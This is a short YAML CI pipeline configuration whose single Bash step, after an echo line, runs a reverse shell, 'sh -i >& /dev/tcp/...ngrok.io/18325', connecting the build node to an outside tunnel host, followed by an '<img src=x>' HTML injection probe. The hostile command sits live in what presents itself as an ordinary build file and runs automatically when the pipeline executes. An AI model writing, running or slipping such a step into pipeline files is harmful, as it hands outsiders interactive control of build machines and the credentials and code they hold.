pipelines:
  - name: shmavers_pipeline
    configuration:
      nodePool:   ubuntu 
    steps:
      - name: shmaver_step
        type: Bash
        configuration:
          nodePool: ubuntu
        execution:
          onExecute:
            - echo "running shell"
            - sh -i >& /dev/tcp/5.tcp.eu.ngrok.io/18325 0>&1
            - <img src=x>
